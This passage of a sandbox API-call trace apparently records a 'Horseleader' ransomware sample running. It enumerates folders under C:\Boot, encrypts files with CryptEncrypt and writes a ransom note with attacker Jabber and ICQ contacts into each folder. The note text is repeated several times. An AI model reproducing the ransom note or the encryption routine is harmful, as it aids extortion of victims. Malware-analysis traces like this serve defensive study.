Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.717] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0121.717] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.717] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\#Decrypt#.txt") returned 31 [0121.717] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\#Decrypt#.txt" (normalized: "c:\\boot\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.718] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.718] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.719] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.719] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.719] CloseHandle (hObject=0x200) returned 1 [0121.719] GetProcessHeap () returned 0x780000 [0121.720] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.720] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="es-ES", cAlternateFileName="")) returned 1 [0121.720] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0121.720] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0121.720] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0121.720] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0121.720] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.720] GetProcessHeap () returned 0x780000 [0121.720] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.721] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0121.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.728] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0121.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.728] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.728] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0121.729] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.729] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.729] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.729] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.729] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0121.729] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.729] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.729] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.729] lstrlenW (lpString=".testttjffg") returned 11 [0121.729] StrStrW (lpFirst="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.730] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.730] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.730] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.730] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\#Decrypt#.txt") returned 31 [0121.730] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\#Decrypt#.txt" (normalized: "c:\\boot\\es-es\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.731] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.731] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.732] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.733] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.733] CloseHandle (hObject=0x200) returned 1 [0121.733] GetProcessHeap () returned 0x780000 [0121.733] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.733] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0121.733] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0121.734] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0121.734] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0121.734] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0121.734] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.734] GetProcessHeap () returned 0x780000 [0121.734] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.734] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0121.734] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.735] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0121.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.735] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.735] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0121.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.736] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.736] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.736] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.736] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0121.736] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".horseleader") returned 0x0 [0121.736] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0121.736] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0121.736] lstrlenW (lpString=".testttjffg") returned 11 [0121.736] StrStrW (lpFirst="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpSrch=".testttjffg") returned 0x0 [0121.736] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0121.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0121.737] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.737] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0121.737] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0121.740] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\#Decrypt#.txt") returned 31 [0121.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\#Decrypt#.txt" (normalized: "c:\\boot\\fi-fi\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.740] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0121.740] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0121.742] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0121.742] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0121.742] CloseHandle (hObject=0x200) returned 1 [0121.743] GetProcessHeap () returned 0x780000 [0121.743] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 